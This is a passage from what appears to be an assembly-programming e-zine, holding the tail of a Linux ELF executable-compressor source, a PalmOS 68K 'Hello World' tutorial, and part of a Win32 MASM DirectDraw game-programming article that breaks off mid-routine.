         mov     bl,10h
U02:    call    ebp
         adc     bl,bl
         jnc     U02

         jnz     U10

         xchg    ebx,eax
         jmp     short U12

U03:    inc     ebx
U04:    call    ebp
         adc     ebx,ebx
         call    ebp
         jc      U04

U05:    call    ebp
         adc     ecx,ecx
         call    ebp
         jc      short U05

         dec     ebx
         dec     ebx
         jz      short U09
         dec     ebx
         shl     ebx,8
;;;;;;; clc             ; clc isn't needed because EBX < 01000000h before
shift

U06:    mov     bl,byte [esi]
         inc     esi
         jnc     U07

         shr     bl,1
         jz      U15
         sbb     cl,ch           ; equ SBB CL,BH because BH=CH=0

U07:    ;cmp    ebx,00007D00h   ; this is not implemented, yet
         ;jnc    zvys_o_dve      ; i found this in WINCMD32.EXE v. 4.03
         ;cmp    ebx,00000500h   ; packed with ASPACK
         ;jnc    zvys_o_jennu
                 ; isn't rational compress 3 bytes with shift > 7CFFh
                 ; rational is at least 4 bytes
                 ; isn't rational compress 2 bytes with shift > 4FFh
                 ; rational is at least 3 bytes
         cmp     ebx, byte 7Fh   ;db     83h,0FBh,7Fh
         jnbe    U08

zvys_o_dve:
         inc     ecx
zvys_o_jennu:
         inc     ecx

U08:    pop     eax
         db      0A8h            ; opcodes A8 5B = TEST AL,5B
U09:    pop     ebx             ; opcode 5B
         push    ebx
U10:    neg     ebx

U11:    mov     al,byte [edi+ebx]
U12:    stosb
         loop    U11
         jmp     short U01

U13:    add     dl,dl           ; get highest bit from control_byte
         jnz     U14    ; is it last non-zero bit ? = all 8 bits was
processed ?
         lodsb                   ; load control_byte
         xchg    edx,eax         ; store control_byte to DL
         adc     dl,dl           ; put last bit from last control_byte to bit
0.
                                 ; of new control_byte
U14:    ret

U15:    pop     eax
         popad
         popfd
         db      0E9h            ; jump
         dd      0

uncompress_routine_end:
uncompress_routine_size equ     $ - uncompress_routine

; -------

MEOF            db      'ERROR OPEN file!',0Ah
MEOFS           equ     $ - MEOF
MECF            db      'ERROR CREAT file!',0Ah
MECFS           equ     $ - MECF
MSEEF           db      'ERROR SEEK to END of file!',0Ah
MSEEFS          equ     $ - MSEEF
MSEBF           db      'ERROR SEEK to BEGIN of file!',0Ah
MSEBFS          equ     $ - MSEBF
MERF            db      'ERROR READ file!',0Ah
MERFS           equ     $ - MERF
MEWF            db      'ERROR WRITE file!',0Ah
MEWFS           equ     $ - MEWF
usage           db      0Ah,'K0mprezz ELF ASM executab1e fy1e usyng OOO
alg0ry'
                 db      'thm',0Ah
                 db      0Ah,'usage: a00 '
                 db      'filename_for_compress compressed_filename',0Ah,0Ah
                 db      'ASM coding in LINUX by Feryno',0Ah
                 db      'Feryno: ASSEMBLER-only and DISASSEMBLER-only
wonderfu'
                 db      'l'
                 db      0Ah,0Ah
usagesize       equ     $ - usage
progress_text   db      0Dh,'00000000h/00000000h'
progress_text_size      equ     $ - progress_text

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
                                 ;;
filesize        equ     $ - $$  ;;
                                 ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

SECTION .bss
ALIGNB 4

f0h             resd    1       ; in_file handle
f1h             resd    1       ; out_file handle
f0s_2           resd    1       ; in_file size
f0s             resd    1       ; in_file size
position        resd    1       ; required by putbit procedures
konyc_dat       resd    1
last_delta      resd    1

fy1eObuffer     resb    4Ch             ; header of a file
f0b             resb    100000h         ; kode & data of a fy1e
f0b_size        equ     $ - fy1eObuffer

f1b_size        equ     200000h
f1b             resb    f1b_size


;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
                                 ;;
bsssize         equ     $ - $$  ;;
                                 ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
                                                 ;;
memsize         equ     filesize+bsssize        ;;
                                                 ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::........................................PALMOS.ENVIRONMENT
                                                                Hello Tiny
World
                                                                by Latigo


Hola! This is a tutorial on assembler for the PalmOS enviroment. I decided
to
write them due to the lack of material on the web. To assemble the asm
presented in this paper, you need to get Darrin Massena's ASDK; which can be
downloaded from http://www.massena.com/darrin/pilot/index.html. The ASDK
contains an assembler,disassembler, the palm emulator and many other great
tools. Massena is the low-level-semi-god-techno-guru who created the
assembler
(Pila), along with many other tools and documents. He was my starting point
(and for many others too) for asm coding in the Palm enviroment.

The Palm uses a variation of the 68K Motorola CPU called 'DragonBall' which
has
8 32-bit Data registers (from D0 to D7), 8 Addres registers (from A0 to A7)
being A7 the stack pointer,one PC register which is the 'Program Counter'
which
contains the address of the instruction to be executed next and one 16 bits
register called the Status Register (SR). Another thing to be noted is the
way
operands are specified in the DragonBall enviroment. It's not 'DEST,SRC' as
in
the Wintel world we all know, but 'SRC,DEST'. Say if you wanted to copy all
the
contents of the D7 register to the D0 this should be done: 'MOVE.L D7,D0'.

One last very important thing too is how to specify data types. In the
previous
example i used 'MOVE.L' where '.L' is talking about a 'long' data type. I
could
have used '.b' or '.w' meaning byte and word respectively. The size is
always
appended, when suitable, to the instruction nmemonic. So what im gonna show
you
here is something pretty basic, but will be enough as a start. It's the
typicall 'Hello World'.


Theory:
-------
We will create a basic Palm program in assembly which will make use of the
FrmAlert Systrap in order to display an Alert Resource.

Word FrmAlert (
         Word alertId
);

As you can see this Systrap (the word Systrap can be taken as a sinonym of
the
word 'API') takes one parameter. An Alert resource. There are many resource
types (String,Form,version,etc) but we only care for the 'Alert' type. All
this
means that we must create a resource file (.rcp) which includes our Alert
and
the Asm file (.asm) which contains the code to display the Alert resource.

All this said, lets do some 'Hello tiny world' :)


The resource file (Hello.rcp):
------------------------------

; Here we are going to declare our resources. In this case only an Alert
; resource is going to be create since that's all we need

         ALERT ID 1000
; This is the ID of our Alert.

         INFORMATION
; This is the TYPE of the Alert. It could be [INFORMATION]
; or [CONFIRMATION] or [WARNING] or [ERROR]

         BEGIN
; Beginning of the Alert resource. Let's define all it's properties.

         TITLE "Hello tiny World!"
; This would be the title of the Alert

         MESSAGE "This is just the beginning!"
; Yes, you guessed. Its the Message

         BUTTONS "Ciao :)"
; In this case we have only one button

         END
; END of the Alert resource


The asm file (Hello.asm):
-------------------------

Appl    "MBox", 'Lat1'

; This sets the program's name and Id. The name is the one that will show up
in
; the installed program's list. The ID is that,an ID :)

include "Pilot.inc"
; Just like windows.inc, full of constants, structure offsets,API trap
codes,
; etc.

include "Startup.inc"
; Startup.inc contains a standard startup function which must be the first
; within an application and is called by the PalmOS after the app is loaded.
; SysAppStartup is first executed, if it doesn't fail, then PilotMain in our
; app is called and after it returns, SysAppExit is called. In short, don't
; remove this :)


MyAlert   equ     1000
; Some Constants

         code

proc PilotMain(cmd.w, cmdPBP.l, launchFlags.w)

; Just like WinMain; PilotMain's prototype is in Pilot.inc.
; It takes three parameters, a WORD (cmd), a LONG (cmdPBP) and another WORD
; (launchFlags)
; Whenever parameters are passed to API calls, their size has to specified
too.
; So '.b' for a byte,'.w' for a word and '.l' for a Long.
; Remember that PilotMain is called from StartUp.inc!!

beginproc
; Marks the beginning of a procedure by reserving the needed space in the
stack
; for local variables if any. To do this it performs the link a6,#nnnn where
; #nnnn is the number of bytes.

TST.W   cmd(a6)
; PilotMain function is called many times in different circumstances so here
we
; check that the cmd parameter is 0 (sysAppLaunchCmdNormalLaunch is 0?)
which
; would mean a 'normal' program launching.
; TST.W   cmd(a6) means 'CMP WORD PTR cmd,0' in the Intel enviroment .W
implies
; that only 2 bytes out of the cmd variable will be TeSTed cmd(a6) tells
pila
; that the cmd variable is a LOCAL variable. Would it have been cmd(a5),
then
; the assembler would know that cmd is a GLOBAL variable.

BNE     PmReturn
; BNE = Branch Not Equal. Just like the beloved JNZ

systrap FrmAlert(#MyAlert.w)
; MessageBox! :) systrap is the keyword to invoke APIs, it PUSHes the
specified
; parameters and cleans the stack after the API execution.
; # means that MyAlert is specifying a CONSTANT NUMBER and .w means that
; MyAlert is making reference to a WORD
;
; systrap FrmAlert(#MyAlert.w) would be the same as:
; move.w  #MyAlert,-(a7)         = push alert id on stack and decrement it
; trap    #15                    = PalmOS API call
; dc.w    sysTrapFrmAlert        = invoke the alert dialog! by declaring the
;                                  word that is equivalent to
'sysTrapFrmAlert'
; addq.l  #2,a7                  = correct stack


PmReturn
; Just a Label

endproc
; Sefiní, endproc executes the unlk and rts instructions

;-----------------------Resources------------------------------
; Here we must 'tell' pila all those resources that we created so it will
; include them to our assembled code.
; We now declare ALL the resources being used by Hello.asm, the keyword
'res'
; is first placed; followed by the TYPE of the resource.


         ;-=Alert   Resources=-
res 'Talt', MyAlert, "Talt03e8.bin"


         ; This resource defines launch flags, stack and heap size :)
res     'pref', 1
         dc.w
sysAppLaunchFlagNewStack|sysAppLaunchFlagNewGlobals|sysAppLaunc
hFlagUIApp|sysAppLaunchFlagSubCall
         dc.l    $1000                   ; stack size
         dc.l    $1000                   ; heap size


;------------------------------ end
--------------------------------------------

That's all my friends! to assemble and link this program execute the
following:

         pilrc Hello.rcp
         pila Hello.asm

Pilrc being the resource compiler and pila the assembler of course.
Well, that's it! easy huh? Next time i'll complicate things a little bit
including a Form :)
Should your Palm Asm hunger be unstoppable, you could check my site
for more coding and reversing stuff: www.latigo.cjb.net.

Take Care! Bye!

Latigo



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::.............................................GAMING.CORNER
                                             Win32 ASM Game Programming -
Part 2
                                             by Chris Hobbs


[This series  of articles was  first  posted at  GameDev.net and  is now
being
published here with the author's permission. Here is Chris Hobbs'
introduction
on this particular article:

"A continuation of the  development of SPACE-TRIS.  This one covers the
coding
   of WinMain, a Direct Draw library, and a Bitmap library."

Visit his website at http://www.fastsoftware.com.
Preface, Html-to-Txt conversion and formating by Chili]


Where Did We Leave Off?
-----------------------
The last article discussed many basics of Win32 ASM programming, introduced
you
to the game we will be creating, and guided you through the design process.
Now
it is time to take it a few steps further. First, I will cover, in depth,
the
High Level constructs of MASM that make it extremely readable ( at generally
no
performance cost ), and make it as easy to write as C expressions. Then,
once
we have a solid foundation in our assembler we will take a look at the Game
Loop and the main Windows procedures in the code. With that out of the way
we
will take a peek at Direct Draw and the calls associated with it. Once, we
understand how DirectX works we can build our Direct Draw library. After
that
we will build our bitmap file library. Finally, we will put it all together
in
a program that displays our Loading Game screen and exits when you hit the
escape key.

It is a pretty tall order but I am pretty sure we can cover all of the
topics
in this article. Remember: If you want to compile the code you need the
MASM32
[http://www.pbq.com.au/home/hutch/] package, or at the very least a copy of
MASM 6.11+.

If you are already familiar with MASM's HL syntax then I would suggest
skipping
the next section. However, those of you who are rusty, or have never even
heard
of it, head on to the next section. There you will learn more than you will
probably ever need to know about this totally cool addition to our
assembler.


MASM's HL Syntax
----------------
I am sure many of you have seen an old DOS assembly language listing. Take a
moment to recall that listing, and picture the code. Scary? Well, 9 times
out
of 10 it was scary. Most ASM programmers wrote very unreadable code, simply
because that was the nature of their assembler. It was littered with labels
and
jmp's, and all sorts of other mysterious things. Try stepping through it
with
your mental computer. Did you crash? Yeah, don't feel bad. It is just how it
is. Now, that was the 9 out of 10 ... what about that 1 out of 10? What is
the
deal with them? Well, those are the programmers who coded MACRO's to
facilitate
High Level constructs in their programs. For once, Microsoft did something
incredibly useful with MASM 6.0 ... they built those HL MACRO's, that smart
programmers had devised, into MASM as pseudo-ops.

If you aren't aware of what this means I will let you in on it. MASM's
assembly
code is now just as readable and easy to write as C. This, of course, is
just
my opinion. But, it is an opinion shared by thousands and thousands of ASM
coders. So, now that I have touted its usefulness let's take a look at some
C
constructs and their MASM counterparts.


                               IF - ELSE IF - ELSE

         The C version:                          The MASM version:

         if ( var1 == var2 )                     .if ( var1 == var2 )
         {                                           ; Code goes here
             // Code goes here                   .elseif ( var1 == var3 )
         }                                           ; Code goes here
         else                                    .else
         if ( var1 == var3 )                         ; Code goes here
         {                                       .endif
             // Code goes here
         }
         else
         {
             // Code goes here
         }


                                   DO - WHILE

         The C version:                          The MASM version:

         do                                      .repeat
         {                                           ; Code goes here
             // Code goes here                   .until ( var1 != var2 )
         }
         while ( var1 == var2 );


                                      WHILE

         The C version:                          The MASM version:

         while ( var1 == var2 )                  .while ( var1 == var2 )
         {                                           ; Code goes here
             // Code goes here                   .endw
         }


Those are the constructs that we can use in our code. As you can see they
are
extremely simple and allow for nice readable code. Something assembly
language
has long been without. There is no performance loss for using these
constructs,
at least I haven't found any. They typically generate the same jmp and cmp
code
that a programmer would if he were writing it with labels and such. So, feel
free to use them in your code as you see fit ... they are a great asset.

There is one other thing we should discuss and that is the psuedo-ops that
allow us to define procedures/functions easily. PROTO and PROC. Using them
is
really simple. To begin with, just as in C you need to have a prototype. In
MASM this is done with the PROTO keyword. Here are some examples of
declaring
protoypes for your procedures:


         ;==================================
         ; Main Program Procedures
         ;==================================
         WinMain PROTO           :DWORD,:DWORD,:DWORD,:DWORD
         WndProc PROTO           :DWORD,:DWORD,:DWORD,:DWORD


The above code tells the assembler it should expect a procedure by the name
of
WinMain and one by the name of WndProc. Each of these has a parameter list
associated with them. They both happen to expect 4 DWORD values to be passed
to
them. For those of you using the MASM32 package, you already have all of the
Windows API functions prototyped, you just need to include the appropriate
include file. But, you need to make sure that any user defined procedure is
prototyped in the above fashion.

Once we have the function prototyped we can create it. We do this with the
PROC
keyword. Here is an example:


;########################################################################
; WinMain Function
;########################################################################
WinMain PROC    hInstance       :DWORD,
                 hPrevInst       :DWORD,
                 CmdLine         :DWORD,
                 CmdShow         :DWORD




         ;===========================
         ; We are through
         ;===========================
         return msg.wParam

WinMain endp
;########################################################################
; End of WinMain Procedure
;########################################################################


By writing our functions in this manner we can access all passed parameters
by
the name we give to them. The above function is WinMain w/o any code in it.
You
will see the code in a minute. For now though, pay attention to how we setup
the procedure. Also notice how it allows us to create much cleaner looking
code, just like the rest of the high level constructs in MASM do also.


Getting A Game Loop Running
---------------------------
Now that we all know how to use our assembler, and the features contained in
it, lets get a basic game shell up and running.

The first thing we need to do is get setup to enter into WinMain(). You may
be
wondering why the code doesn't start at WinMain() like in C/C++. The answer
is:
in C/C++ it doesn't start there either. The code that we will write is
generated for you by the compiler, therefore it is completely transparent to
you. We will most likely do it differently than the compiler, but the
premise
will be the same. So here is what we will code to get into the WinMain()
function...


   .CODE

start:
         ;==================================
         ; Obtain the instance for the
         ; application
         ;==================================
         INVOKE GetModuleHandle, NULL
         MOV     hInst, EAX

         ;==================================
         ; Is there a commandline to parse?
         ;==================================
         INVOKE GetCommandLine
         MOV     CommandLine, EAX

         ;==================================
         ; Call the WinMain procedure
         ;==================================
         INVOKE WinMain,hInst,NULL,CommandLine,SW_SHOWDEFAULT

         ;==================================
         ; Leave the program
         ;==================================
         INVOKE ExitProcess,EAX


The only thing that may seem a little confusing is why we MOV EAX into a
variable at the end of a INVOKE. The reason is all Windows functions, and C
functions for that matter, place the return value of a function/procedure in
EAX. So we are effectively doing an assignment statement with a function
when
we move a value from EAX into something. This code above is going to be the
same for every Windows application that you write. At least, I have never
had
need to change it. The code simply sets everything up and ends it when we
are
finished.

If you follow the code you will see that it calls WinMain() for us. This is
where things can get a bit confusing ... so let's have a look at the code
first.


;########################################################################
; WinMain Function
;########################################################################
WinMain PROC    hInstance       :DWORD,
                 hPrevInst       :DWORD,
                 CmdLine         :DWORD,
                 CmdShow         :DWORD

         ;====================
         ; Put LOCALs on stack
         ;====================
         LOCAL wc        :WNDCLASS

         ;==================================================
         ; Fill WNDCLASS structure with required variables
         ;==================================================
         MOV     wc.style, CS_OWNDC
         MOV     wc.lpfnWndProc,OFFSET WndProc
         MOV     wc.cbClsExtra,NULL
         MOV     wc.cbWndExtra,NULL
         m2m     wc.hInstance,hInst      ;<< NOTE: macro not mnemonic
         INVOKE GetStockObject, BLACK_BRUSH
         MOV     wc.hbrBackground, EAX
         MOV     wc.lpszMenuName,NULL
         MOV     wc.lpszClassName,OFFSET szClassName
         INVOKE LoadIcon, hInst, IDI_ICON        ; icon ID
         MOV     wc.hIcon,EAX
         INVOKE LoadCursor,NULL,IDC_ARROW
         MOV     wc.hCursor,EAX

         ;================================
         ; Register our class we created
         ;================================
         INVOKE RegisterClass, ADDR wc

         ;===========================================
         ; Create the main screen
         ;===========================================
         INVOKE CreateWindowEx,NULL,
                 ADDR szClassName,
                 ADDR szDisplayName,
                 WS_POPUP OR WS_CLIPSIBLINGS OR \
                 WS_MAXIMIZE OR WS_CLIPCHILDREN,
                 0,0,640,480,
                 NULL,NULL,
                 hInst,NULL

         ;===========================================
         ; Put the window handle in for future uses
         ;===========================================
         MOV     hMainWnd, EAX

         ;====================================
         ; Hide the cursor
         ;====================================
         INVOKE ShowCursor, FALSE

         ;===========================================
         ; Display our Window we created for now
         ;===========================================
         INVOKE ShowWindow, hMainWnd, SW_SHOWDEFAULT

         ;=================================
         ; Intialize the Game
         ;=================================
         INVOKE Game_Init

         ;========================================
         ; Check for an error if so leave
         ;========================================
         .IF EAX != TRUE
                 JMP shutdown
         .ENDIF

         ;===================================
         ; Loop until PostQuitMessage is sent
         ;===================================
         .WHILE TRUE
                 INVOKE PeekMessage, ADDR msg, NULL, 0, 0, PM_REMOVE
                 .IF (EAX != 0)
                         ;===================================
                         ; Break if it was the quit message
                         ;===================================
                         MOV EAX, msg.message
                         .IF EAX == WM_QUIT
                                 ;======================
                                 ; Break out
                                 ;======================
                                 JMP shutdown
                         .ENDIF

                         ;===================================
                         ; Translate and Dispatch the message
                         ;===================================
                         INVOKE TranslateMessage, ADDR msg
                         INVOKE DispatchMessage, ADDR msg

                 .ENDIF

                 ;================================
                 ; Call our Main Game Loop
                 ;
                 ; NOTE: This is done every loop
                 ; iteration no matter what
                 ;================================
                 INVOKE Game_Main

         .ENDW

shutdown:
         ;=================================
         ; Shutdown the Game
         ;=================================
         INVOKE Game_Shutdown

         ;=================================
         ; Show the Cursor
         ;=================================
         INVOKE ShowCursor, TRUE

getout:
         ;===========================
         ; We are through
         ;===========================
         return msg.wParam

WinMain endp
;########################################################################
; End of WinMain Procedure
;########################################################################


This is quite a bit of code and is rather daunting at first glance. But,
let's
examine it a piece at a time. First we enter the function, notice that the
local variables ( in this case a WNDCLASS variable ) get placed on the stack
without your having to code anything. The code is generated for you ... you
can
declare local variables like in C. Thus, at the end of the procedure we
don't
need to tell the assembler how much to pop off of the stack ... it is done
for
us also. Then, we fill in this structure with various values and variables.
Note the use of m2m. This is because in ASM you are not allowed to move a
memory value to another memory location w/o placing it in a register, or on
the
stack first.

Next, we make some calls to register our window class and create a new
window.
Then, we hide the cursor. You may want the cursor ... but for our game we do
not. Now we can show our window and try to initialize our game. We check for
an
error after calling the Game_Init() procedure. If there was an error the
function would not return true and this would cause our program to jump to
the
shutdown label. It is important that we jump over the main message loop. If
we
do not, the program will continue executing. Also, make sure that you do not
just return out of the code ... there still may be some things that need to
be
shutdown. It is good practice in ASM, just as in all other languages, to
have
one entry point and one exit point in each of your procedures -- this makes
debugging easier.

Now for the meat of WinMain(): the message loop. For those of you that have
never seen a Windows message loop before here is a quick explanation.
Windows
maintains a queue of messages that the application receives -- whether from
other applications, user generated, or internal. In order to do ANYTHING an
application must process messages. These tell you that a key has been
pressed,
the mouse button clicked, or the user wants to exit your program. If this
were
a normal program, and not a high performance game, we would use GetMessage()
to
retrieve a message from the queue and act upon it.

The problem however is, if there are no messages, the function WAITS until
it
receives one. This is totally unacceptable for a game. We need to be
constantly
performing our loop, no matter what messages we receive. So, one way around
this, is to use PeekMessage() instead. PeekMessage() will return zero if it
has
no messages, otherwise it will grab it off of the queue.

What this means is, if we have a message, it will get translated and
dispatched
to our callback function. Furthermore, if we do not, then the main game loop
will be called instead. Now here is the trick, by arranging the code just
right, the main game loop will be called -- even if we process a message. If
we
did not do this, then Windows could process 1,000's of messages while our
game
loop wouldn't execute once!

Finally, when a quit message is passed to the queue we will jump out of our
loop and execute the shutdown code. And that ... is the basic game loop.


Connecting to Direct Draw
-------------------------
Now we are going to get a little bit advanced. But, only for this section.
Unfortunately there is no cut and dry way to view DirectX in assembly. So, I
am
going to explain it briefly, show you how to use it, and then forget about
it.
This is not that imperative to know about, but it helps if you at least
understand the concepts.

The very first thing you need to understand is the concept of a Virtual
Function Table. This is where your call really goes to be blunt about it.
The
call offsets into this table, and from it selects the proper function
address
to jump to. What this means to you is your call to a function is actually a
call to a simple look-up table that is already generated. in this way,
DirectX
or any other type library such as DirectX can change functions in a library
w/o
you ever having to know about it.

Once we have gotten that straight we can figure out how to make calls in
DirectX. Have you guessed how yet? The answer is we need to mimic the table
in
some way so that our call is offset into the virtual table at the proper
address. We start by simply having a base address that gets called, which is
a
given in DirectX libraries. Then we make a list of all functions for that
object appending the size of their parameters. This is our offset into the
table. Now, we are all set to call the functions.

Calling these functions can be a bit of work. First you have to specify the
address of the object that you want to make the call on. Then, you have to
resolve the virtual address, and then, finally, push all of the parameters
onto
the stack, including the object, for the call. Ugly isn't it? For that
reason
there is a set of macros provided that will allow you to make calls for
these
objects fairly easily. I will only cover one since the rest are based on the
same premise. The most basic one is DD4INVOKE. This macro is for a Direct
Draw
4 object. It is important that we have different invokes for different
versions
of the same object. If we did not, then wrong routines would be called since
the Virtual Table changes as they add/remove functions from the lib's.

The idea behind the macro is fairly simple. First, you specify the function
name, then the object name, and then the parameters. Here is an example:


         ;========================================
         ; Now create the primary surface
         ;========================================
         DD4INVOKE CreateSurface, lpdd, ADDR ddsd, ADDR lpddsprimary, NULL


The above line of code calls the CreateSurface() function on a Direct Draw 4
object. It passes the pointer to the object, the address of a Direct Draw
Surface Describe structure, the address of the variable to hold the pointer
to
the surface, and finally NULL. This call is an example of how we will
interface
to DirectX in this article series. Now that we have seen how to make calls
to
DirectX, we need to build a small library for us to use which we cover in
the
next section.


Our Direct Draw Library
-----------------------
Alright, we are now ready to start coding our Direct Draw library routines.
So,
the logical starting place would be figuring out what kinds of routines we
will
need for the game. Obviously we want an initialization and shutdown routine,
and we are going to need a function to lock and unlock surfaces. Also, it
would
be nice to have a function to draw text, and, since the game is going to run
in
16 bpp mode, we will want a function that can figure out the pixel format
for
us. It would also be a good idea to have a function that creates surfaces,
loads a bitmap into a surface, and a function to flip our buffers for us.
That
should cover it ... so lets get started.

The first routine that we will look at is the initialization routine. This
is
the most logical place to start, especially since the routine has just about
every type of call we will be using in Direct Draw. Here is the code:


;########################################################################
; DD_Init Procedure
;########################################################################
DD_Init PROC    screen_width:DWORD, screen_height:DWORD, screen_bpp:DWORD

         ;=======================================================
         ; This function will setup DD to full screen exclusive
         ; mode at the passed in width, height, and bpp
         ;=======================================================

         ;=================================
         ; Local Variables
         ;=================================
         LOCAL lpdd_1    :LPDIRECTDRAW

         ;=============================
         ; Create a default object
         ;=============================
         INVOKE DirectDrawCreate, 0, ADDR lpdd_1, 0

         ;=============================
         ; Test for an error
         ;=============================
         .IF EAX != DD_OK
                 ;======================
                 ; Give err msg
                 ;======================
                 INVOKE MessageBox, hMainWnd, ADDR szNoDD, NULL, MB_OK

                 ;======================
                 ; Jump and return out
                 ;======================
                 JMP err

         .ENDIF

         ;=========================================
         ; Lets try and get a DirectDraw 4 object
         ;=========================================
         DDINVOKE QueryInterface, lpdd_1, ADDR IID_IDirectDraw4, ADDR lpdd

         ;=========================================
         ; Did we get it??
         ;=========================================
         .IF EAX != DD_OK
                 ;==============================
                 ; No so give err message
                 ;==============================
                 INVOKE MessageBox, hMainWnd, ADDR szNoDD4, NULL, MB_OK

                 ;======================
                 ; Jump and return out
                 ;======================
                 JMP err

         .ENDIF

         ;===================================================
         ; Set the cooperative level
         ;===================================================
         DD4INVOKE SetCooperativeLevel, lpdd, hMainWnd, \
                 DDSCL_ALLOWMODEX OR DDSCL_FULLSCREEN OR \
                 DDSCL_EXCLUSIVE OR DDSCL_ALLOWREBOOT

         ;=========================================
         ; Did we get it??
         ;=========================================
         .IF EAX != DD_OK
                 ;==============================
                 ; No so give err message
                 ;==============================
                 INVOKE MessageBox, hMainWnd, ADDR szNoCoop, NULL, MB_OK

                 ;======================
                 ; Jump and return out
                 ;======================
                 JMP err

         .ENDIF

         ;===================================================
         ; Set the Display Mode
         ;===================================================
         DD4INVOKE SetDisplayMode, lpdd, screen_width, \
                 screen_height, screen_bpp, 0, 0

         ;=========================================
         ; Did we get it??
         ;=========================================
         .IF EAX != DD_OK
                 ;==============================
                 ; No so give err message
                 ;==============================
                 INVOKE MessageBox, hMainWnd, ADDR szNoDisplay, NULL, MB_OK

                 ;======================
                 ; Jump and return out
                 ;======================
                 JMP err

         .ENDIF

         ;================================
         ; Save the screen info
         ;================================
         m2m     app_width, screen_width
         m2m     app_height, screen_height
         m2m     app_bpp, screen_bpp

         ;========================================
         ; Setup to create the primary surface
         ;========================================
         DDINITSTRUCT OFFSET ddsd, SIZEOF(DDSURFACEDESC2)
         MOV     ddsd.dwSize, SIZEOF(DDSURFACEDESC2)
         MOV     ddsd.dwFlags, DDSD_CAPS OR DDSD_BACKBUFFERCOUNT;
         MOV     ddsd.ddsCaps.dwCaps, DDSCAPS_PRIMARYSURFACE OR \
                         DDSCAPS_FLIP OR DDSCAPS_COMPLEX
         MOV     ddsd.dwBackBufferCount, 1

         ;========================================
         ; Now create the primary surface
         ;========================================
         DD4INVOKE CreateSurface, lpdd, ADDR ddsd, ADDR lpddsprimary, NULL

         ;=========================================
         ; Did we get it??
         ;=========================================
         .IF EAX != DD_OK
                 ;==============================
                 ; No so give err message
                 ;==============================
                 INVOKE MessageBox, hMainWnd, ADDR szNoPrimary, NULL, MB_OK

                 ;======================
                 ; Jump and return out
                 ;======================
                 JMP err

         .ENDIF

         ;==========================================
         ; Try to get a backbuffer
         ;==========================================
         MOV     ddscaps.dwCaps, DDSCAPS_BACKBUFFER
       DDS4INVOKE GetAttachedSurface, lpddsprimary, ADDR ddscaps, ADDR
lpddsback

         ;=========================================
         ; Did we get it??
         ;=========================================
         .IF EAX != DD_OK
                 ;==============================
                 ; No so give err message
                 ;==============================
                 INVOKE MessageBox, hMainWnd, ADDR szNoBackBuffer, NULL,
MB_OK

                 ;======================
                 ; Jump and return out
                 ;======================
                 JMP err

         .ENDIF

         ;==========================================
         ; Get the RGB format of the surface
         ;==========================================
         INVOKE DD_Get_RGB_Format, lpddsprimary

done:
         ;===================
         ; We completed
         ;===================
         return TRUE

err:
         ;===================
         ; We didn't make it
         ;===================
         return FALSE

DD_Init      ENDP
;########################################################################
; END DD_Init
;########################################################################


The above code is fairly complex so let's see what each individual section
does.

The first step is we create a default Direct Draw object. This is nothing
more
than a simple call with a couple of parameters. NOTE: since it is NOT based
on
an already created object, the function is not virtual. Therefore, we can
call
it like a normal function using invoke. Also, notice how we check for an
error
right afterwards. This is very important in DirectX. In the case of an
error,
we merely give a message, and then jump to the error return at the bottom of
the procedure.

The second step is we query for a DirectDraw4 object. We will almost always
want the newest version of the objects, and querying after you have the base
object is the way to get them. If this succeeds we then set the cooperative
level and the display mode for our game. Nothing major ... but don't forget
to
check for errors.

Our next step is to create a primary surface for the object that we have. If
that succeeds we create the back buffer. The structure that we use in this
call, and other DirectX calls, needs to be cleared before using it. This is
done in a macro, DDINITSTRUCT, that I have included in the DDraw.inc file.

The final thing we do is make a call to our routine that determines the
pixel
format for our surfaces. All of these pieces fit together into initializing
our
system for use.

The next routine we will look at is the pixel format obtainer. This is a
fairly
advanced routine so I wanted to make sure that we cover it. Here is the
code:


;########################################################################
; DD_Get_RGB_Format Procedure
;########################################################################
DD_Get_RGB_Format       PROC    surface:DWORD

         ;=========================================================
         ; This function will setup some globals to give us info
         ; on whether the pixel format of the current diaplay mode
         ;=========================================================

         ;====================================
         ; Local variables
         ;====================================
         LOCAL shiftcount :BYTE

         ;================================
         ; get a surface despriction
         ;================================
         DDINITSTRUCT ADDR ddsd, sizeof(DDSURFACEDESC2)
         MOV     ddsd.dwSize, sizeof(DDSURFACEDESC2)
         MOV     ddsd.dwFlags, DDSD_PIXELFORMAT
         DDS4INVOKE GetSurfaceDesc, surface, ADDR ddsd

         ;==============================
         ; fill in masking values
         ;==============================
         m2m     mRed, ddsd.ddpfPixelFormat.dwRBitMask   ; Red Mask
         m2m     mGreen, ddsd.ddpfPixelFormat.dwGBitMask ; Green Mask
         m2m     mBlue, ddsd.ddpfPixelFormat.dwBBitMask  ; Blue Mask

         ;====================================
         ; Determine the pos for the red mask
         ;====================================
         MOV     shiftcount, 0
         .WHILE (!(ddsd.ddpfPixelFormat.dwRBitMask & 1))
                 SHR     ddsd.ddpfPixelFormat.dwRBitMask, 1
                 INC     shiftcount
         .ENDW
         MOV     AL, shiftcount
         MOV     pRed, AL

         ;=======================================
         ; Determine the pos for the green mask
         ;=======================================
         MOV     shiftcount, 0
         .WHILE (!(ddsd.ddpfPixelFormat.dwGBitMask & 1))
                 SHR     ddsd.ddpfPixelFormat.dwGBitMask, 1
                 INC     shiftcount
         .ENDW
         MOV     AL, shiftcount
         MOV     pGreen, AL

         ;=======================================
         ; Determine the pos for the blue mask
         ;=======================================
         MOV     shiftcount, 0
         .WHILE (!(ddsd.ddpfPixelFormat.dwBBitMask & 1))
                 SHR     ddsd.ddpfPixelFormat.dwBBitMask, 1
                 INC     shiftcount
         .ENDW
         MOV     AL, shiftcount
         MOV     pBlue, AL

         ;===========================================
         ; Set a special var if we are in 16 bit mode
         ;===========================================
